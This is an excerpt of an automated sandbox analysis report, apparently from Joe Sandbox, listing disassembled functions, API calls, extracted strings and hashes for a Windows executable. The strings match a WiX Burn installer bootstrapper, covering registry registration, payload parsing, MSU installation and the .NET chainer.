                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                                    • Instruction ID: 1f83ba7e5c6a9a7c99df432497defc9a672367daea291dd42b54e8b67ae18f3a
                                                                                                                                                                    • Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
                                                                                                                                                                    • Instruction Fuzzy Hash: 58B1A0332091A24BEF2D8239843407FFBE95AD23B1B1A179DD4B2CB1D5EE20D535DA20
                                                                                                                                                                    Function 00932E47 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e3025ad2e5ee0c0052250064c8ec02caec3a3acd7e143d3248ea4760e17cbee8
                                                                                                                                                                    • Instruction ID: a9a7a98f39b7697c02d0d21444d94997af94ff9761dda2864b77b0c4f4039ad4
                                                                                                                                                                    • Opcode Fuzzy Hash: e3025ad2e5ee0c0052250064c8ec02caec3a3acd7e143d3248ea4760e17cbee8
                                                                                                                                                                    • Instruction Fuzzy Hash: 3D619B7164470866DF389B688896BBE73ADEF81700F10891AF983DF281D615DE81CF56
                                                                                                                                                                    Function 0090FF99 Relevance: 84.5, APIs: 1, Strings: 47, Instructions: 484registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 00910592
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close
                                                                                                                                                                    • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
                                                                                                                                                                    • API String ID: 3535843008-2755343042
                                                                                                                                                                    • Opcode ID: 96b04ccc7078ffa5b2e8c6d070e9fbeb96dd77456b7f696acc90a168a71125b9
                                                                                                                                                                    • Instruction ID: 059232b16faeff5feee66f38a3425c500029d1e48a84628daf1610b4636f53b6
                                                                                                                                                                    • Opcode Fuzzy Hash: 96b04ccc7078ffa5b2e8c6d070e9fbeb96dd77456b7f696acc90a168a71125b9
                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF1D431B4062EBBDB229665CD42FEE7666ABC4715F140150FD00B62A1D7B2EDE4EBC0
                                                                                                                                                                    Function 0090CDBD Relevance: 73.9, APIs: 3, Strings: 39, Instructions: 366COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,0090545D,00000000,0094CA9C,00905445,00000000), ref: 0090CEF3
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to find catalog., xrefs: 0090D1CE
                                                                                                                                                                    • Failed to get payload node count., xrefs: 0090CE10
                                                                                                                                                                    • CertificateRootPublicKeyIdentifier, xrefs: 0090D03D
                                                                                                                                                                    • Failed to get @FileSize., xrefs: 0090D1AB
                                                                                                                                                                    • Failed to get @Id., xrefs: 0090D221
                                                                                                                                                                    • SourcePath, xrefs: 0090CFB0
                                                                                                                                                                    • LayoutOnly, xrefs: 0090CF8D
                                                                                                                                                                    • Failed to get @Packaging., xrefs: 0090D213
                                                                                                                                                                    • Catalog, xrefs: 0090D0EC
                                                                                                                                                                    • external, xrefs: 0090CF21
                                                                                                                                                                    • embedded, xrefs: 0090CF05
                                                                                                                                                                    • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0090D1B2
                                                                                                                                                                    • FilePath, xrefs: 0090CEAB
                                                                                                                                                                    • Failed to get @DownloadUrl., xrefs: 0090D1EA
                                                                                                                                                                    • Failed to hex decode @CertificateRootThumbprint., xrefs: 0090D1C0
                                                                                                                                                                    • CertificateRootThumbprint, xrefs: 0090D07A
                                                                                                                                                                    • Packaging, xrefs: 0090CEC6
                                                                                                                                                                    • Failed to get @Container., xrefs: 0090D18D
                                                                                                                                                                    • Failed to get @FilePath., xrefs: 0090D21A
                                                                                                                                                                    • payload.cpp, xrefs: 0090CE3F
                                                                                                                                                                    • Failed to get next node., xrefs: 0090D228
                                                                                                                                                                    • Failed to get @LayoutOnly., xrefs: 0090D197
                                                                                                                                                                    • Failed to parse @FileSize., xrefs: 0090D1A1
                                                                                                                                                                    • Failed to get @Catalog., xrefs: 0090D1D5
                                                                                                                                                                    • Failed to to find container: %ls, xrefs: 0090D186
                                                                                                                                                                    • DownloadUrl, xrefs: 0090CFD9
                                                                                                                                                                    • Failed to select payload nodes., xrefs: 0090CDEB
                                                                                                                                                                    • Failed to get @SourcePath., xrefs: 0090D1F1
                                                                                                                                                                    • Invalid value for @Packaging: %ls, xrefs: 0090D200
                                                                                                                                                                    • Payload, xrefs: 0090CDD8
                                                                                                                                                                    • download, xrefs: 0090CEE5
                                                                                                                                                                    • Failed to hex decode the Payload/@Hash., xrefs: 0090D1DC
                                                                                                                                                                    • FileSize, xrefs: 0090D002
                                                                                                                                                                    • Failed to get @Hash., xrefs: 0090D1E3
                                                                                                                                                                    • Failed to get @CertificateRootThumbprint., xrefs: 0090D1C7
                                                                                                                                                                    • Failed to allocate memory for payload structs., xrefs: 0090CE49
                                                                                                                                                                    • Hash, xrefs: 0090D0B7
                                                                                                                                                                    • Container, xrefs: 0090CF4B
                                                                                                                                                                    • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0090D1B9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateCompareProcessString
                                                                                                                                                                    • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                                                                                                                                    • API String ID: 1171520630-3127305756
                                                                                                                                                                    • Opcode ID: 2b9b386ced9db83f66dc51d7c652d5099ab7a92be11c5c0090d040d3b384d07f
                                                                                                                                                                    • Instruction ID: fe520df326a3b95abf3557d7a36f1ef2d488f89888e00bd431ba1c458b689fdf
                                                                                                                                                                    • Opcode Fuzzy Hash: 2b9b386ced9db83f66dc51d7c652d5099ab7a92be11c5c0090d040d3b384d07f
                                                                                                                                                                    • Instruction Fuzzy Hash: D9C10272D4662AFFCB159AE4CC41FAEB668EF45B24F204261FA21B71D0D774EE009790
                                                                                                                                                                    Function 00908476 Relevance: 59.8, APIs: 5, Strings: 29, Instructions: 331COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00905445,?,00000000,80070490,?,?,?,?,?,?,?,?,0092C1BF,?,00905445,?), ref: 009084A7
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00905445,?,?,?,?,?,?,?,?,0092C1BF,?,00905445,?,00905445,00905445,Chain), ref: 00908804
                                                                                                                                                                    Strings
                                                                                                                                                                    • Hidden, xrefs: 0090852F
                                                                                                                                                                    • Initializing version variable '%ls' to value '%ls', xrefs: 00908653
                                                                                                                                                                    • Invalid value for @Type: %ls, xrefs: 00908778
                                                                                                                                                                    • Failed to set variant value., xrefs: 0090878F
                                                                                                                                                                    • Failed to set variant encryption, xrefs: 0090879D
                                                                                                                                                                    • Failed to find variable value '%ls'., xrefs: 009087D2
                                                                                                                                                                    • Failed to insert variable '%ls'., xrefs: 009086C6
                                                                                                                                                                    • Failed to get variable node count., xrefs: 009084E1
                                                                                                                                                                    • Initializing hidden variable '%ls', xrefs: 00908671
                                                                                                                                                                    • Failed to get @Id., xrefs: 009087EF
                                                                                                                                                                    • Attempt to set built-in variable value: %ls, xrefs: 009087C8
                                                                                                                                                                    • Type, xrefs: 009085A3
                                                                                                                                                                    • variable.cpp, xrefs: 009087B9
                                                                                                                                                                    • Failed to get @Persisted., xrefs: 009087E1
                                                                                                                                                                    • Failed to get @Type., xrefs: 00908788
                                                                                                                                                                    • numeric, xrefs: 009085BC
                                                                                                                                                                    • Failed to get @Hidden., xrefs: 009087E8
                                                                                                                                                                    • Failed to get next node., xrefs: 009087F6
                                                                                                                                                                    • Initializing numeric variable '%ls' to value '%ls', xrefs: 009085E2
                                                                                                                                                                    • Failed to get @Value., xrefs: 00908796
                                                                                                                                                                    • Persisted, xrefs: 0090854A
                                                                                                                                                                    • Failed to set value of variable: %ls, xrefs: 009087A7
                                                                                                                                                                    • Failed to select variable nodes., xrefs: 009084C4
                                                                                                                                                                    • Initializing string variable '%ls' to value '%ls', xrefs: 0090861A
                                                                                                                                                                    • version, xrefs: 0090862C
                                                                                                                                                                    • Value, xrefs: 00908565
                                                                                                                                                                    • Variable, xrefs: 009084B1
                                                                                                                                                                    • string, xrefs: 009085F7
                                                                                                                                                                    • Failed to change variant type., xrefs: 009087DA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                                                                                                                    • API String ID: 3168844106-1614826165
                                                                                                                                                                    • Opcode ID: 50dc9a611d3ac5315060de890503c53aa73e53805311f56a8323738bfe4374b8
                                                                                                                                                                    • Instruction ID: e7a031d5749fa5105a6e75c104775309b0eedbd9724251fe0bdea711969d99fd
                                                                                                                                                                    • Opcode Fuzzy Hash: 50dc9a611d3ac5315060de890503c53aa73e53805311f56a8323738bfe4374b8
                                                                                                                                                                    • Instruction Fuzzy Hash: E5B1E172E01229FFCF119B94CC45EAFBB78AF84724F214654F994B61D1CB719A00DB90
                                                                                                                                                                    Function 00926CCC Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 379COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,0091BDDC,00000007,?,?,?), ref: 00926D20
                                                                                                                                                                      • Part of subcall function 00940ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                      • Part of subcall function 00940ACC: GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                      • Part of subcall function 00940ACC: GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 0092710F
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00927123
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to wait for executable to complete: %ls, xrefs: 0092709E
                                                                                                                                                                    • Failed to get process exit code., xrefs: 0092702C
                                                                                                                                                                    • SysNative\, xrefs: 00926D6A
                                                                                                                                                                    • /log:, xrefs: 00926EA2
                                                                                                                                                                    • "%ls" "%ls" /quiet /norestart, xrefs: 00926E48
                                                                                                                                                                    • Failed to format MSU uninstall command., xrefs: 00926E89
                                                                                                                                                                    • Failed to build MSU path., xrefs: 00926E35
                                                                                                                                                                    • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 00926E75
                                                                                                                                                                    • Failed to ensure WU service was enabled to install MSU package., xrefs: 00926F2E
                                                                                                                                                                    • Failed to get cached path for package: %ls, xrefs: 00926DFC
                                                                                                                                                                    • Failed to determine WOW64 status., xrefs: 00926D32
                                                                                                                                                                    • Failed to find Windows directory., xrefs: 00926D5F
                                                                                                                                                                    • Failed to find System32 directory., xrefs: 00926D95
                                                                                                                                                                    • Failed to append SysNative directory., xrefs: 00926D7D
                                                                                                                                                                    • Failed to allocate WUSA.exe path., xrefs: 00926DB3
                                                                                                                                                                    • Bootstrapper application aborted during MSU progress., xrefs: 00927054
                                                                                                                                                                    • Failed to CreateProcess on path: %ls, xrefs: 00926F9A
                                                                                                                                                                    • 2, xrefs: 00926FB3
                                                                                                                                                                    • Failed to append log path to MSU command-line., xrefs: 00926ED4
                                                                                                                                                                    • WixBundleExecutePackageCacheFolder, xrefs: 00926E0B, 0092713B
                                                                                                                                                                    • wusa.exe, xrefs: 00926DA0
                                                                                                                                                                    • Failed to append log switch to MSU command-line., xrefs: 00926EB6
                                                                                                                                                                    • Failed to format MSU install command., xrefs: 00926E5C
                                                                                                                                                                    • msuengine.cpp, xrefs: 00926F8D, 00927022, 0092704A
                                                                                                                                                                    • Failed to get action arguments for MSU package., xrefs: 00926DD6
                                                                                                                                                                    • D, xrefs: 00926F3B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                                    • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
                                                                                                                                                                    • API String ID: 1400713077-4261965642
                                                                                                                                                                    • Opcode ID: 8aed102b90d85d7f0e9e66fec0eb042181a884529f5a2d6bef33801d9f935fd9
                                                                                                                                                                    • Instruction ID: 8e9875f24b60ef62554322ec42d19eecfae31fa8fc2a7515e55bbe21dca5940f
                                                                                                                                                                    • Opcode Fuzzy Hash: 8aed102b90d85d7f0e9e66fec0eb042181a884529f5a2d6bef33801d9f935fd9
                                                                                                                                                                    • Instruction Fuzzy Hash: 37D1D170A4132AEFDF21DFE5EC85FAEBAB8AF48704F100425FA00B2195D7B49958DB50
                                                                                                                                                                    Function 0094744A Relevance: 47.6, APIs: 13, Strings: 14, Instructions: 340COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 0094755D
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947726
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009477C3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$FreeHeap$AllocateCompareProcess
                                                                                                                                                                    • String ID: ($@$`<u$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                                                                                                                    • API String ID: 1555028553-639730868
                                                                                                                                                                    • Opcode ID: 9a29e6fc7c21348fa93db2bf2a41de01116b7bdfc081e1aae4cd27a6f7cb9626
                                                                                                                                                                    • Instruction ID: 6076f7ece4837861cc013e434e39693af9bf19ca881071d109245859dd38de11
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a29e6fc7c21348fa93db2bf2a41de01116b7bdfc081e1aae4cd27a6f7cb9626
                                                                                                                                                                    • Instruction Fuzzy Hash: 5EB18E7194822AFBDB119BE4CC81FAEB778AB04724F600755F521AB2D2D770EA10DB90
                                                                                                                                                                    Function 0094710D Relevance: 47.5, APIs: 11, Strings: 16, Instructions: 298COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00963E78,000000FF,?,?,?), ref: 009471D4
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 009471F9
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00947219
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00947235
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 0094725D
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00947279
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 009472B2
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 009472EB
                                                                                                                                                                      • Part of subcall function 00946D50: SysFreeString.OLEAUT32(00000000), ref: 00946E89
                                                                                                                                                                      • Part of subcall function 00946D50: SysFreeString.OLEAUT32(00000000), ref: 00946EC8
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0094736F
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0094741F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Compare$Free
                                                                                                                                                                    • String ID: ($`<u$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                    • API String ID: 318886736-2569518843
                                                                                                                                                                    • Opcode ID: 7d11a99ee7afc28c7c1d90a1a42ef8a73ce7cbdbcf2767a316ea64c97cfd1616
                                                                                                                                                                    • Instruction ID: f517905b47e39d4b045715f37d8516a83c95340cf73c607e9d9ab69451fb6814
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d11a99ee7afc28c7c1d90a1a42ef8a73ce7cbdbcf2767a316ea64c97cfd1616
                                                                                                                                                                    • Instruction Fuzzy Hash: 1AA18F3194821AFBDB219BE4CC41FAEBB69EB04730F204755F921A61E1DB70EE10DB91
                                                                                                                                                                    Function 0092D43E Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 290synchronizationprocessCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 0092D4B3
                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000027), ref: 0092D4DC
                                                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 0092D5C5
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0092D5CF
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 0092D668
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(0094B500,000000FF,?,?,?,?), ref: 0092D673
                                                                                                                                                                    • ReleaseMutex.KERNEL32(0094B500,?,?,?,?), ref: 0092D69D
                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0092D6BE
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0092D6CC
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0092D704
                                                                                                                                                                      • Part of subcall function 0092D33E: WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,0092D642,?), ref: 0092D357
                                                                                                                                                                      • Part of subcall function 0092D33E: ReleaseMutex.KERNEL32(?,?,?,?,0092D642,?), ref: 0092D375
                                                                                                                                                                      • Part of subcall function 0092D33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092D3B6
                                                                                                                                                                      • Part of subcall function 0092D33E: ReleaseMutex.KERNEL32(?), ref: 0092D3CD
                                                                                                                                                                      • Part of subcall function 0092D33E: SetEvent.KERNEL32(?), ref: 0092D3D6
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0092D7B9
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0092D7D1
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create netfx chainer guid., xrefs: 0092D4C0
                                                                                                                                                                    • Failed to CreateProcess on path: %ls, xrefs: 0092D5FE
                                                                                                                                                                    • %ls /pipe %ls, xrefs: 0092D57F
                                                                                                                                                                    • NetFxChainer.cpp, xrefs: 0092D4F1, 0092D5F3, 0092D6F0, 0092D728
                                                                                                                                                                    • D, xrefs: 0092D5AA
                                                                                                                                                                    • Failed to get netfx return code., xrefs: 0092D6FA
                                                                                                                                                                    • Failed to wait for netfx chainer process to complete, xrefs: 0092D732
                                                                                                                                                                    • Failed to allocate section name., xrefs: 0092D51D
                                                                                                                                                                    • Failed to allocate event name., xrefs: 0092D53F
                                                                                                                                                                    • Failed to create netfx chainer., xrefs: 0092D55E
                                                                                                                                                                    • Failed to process netfx chainer message., xrefs: 0092D648
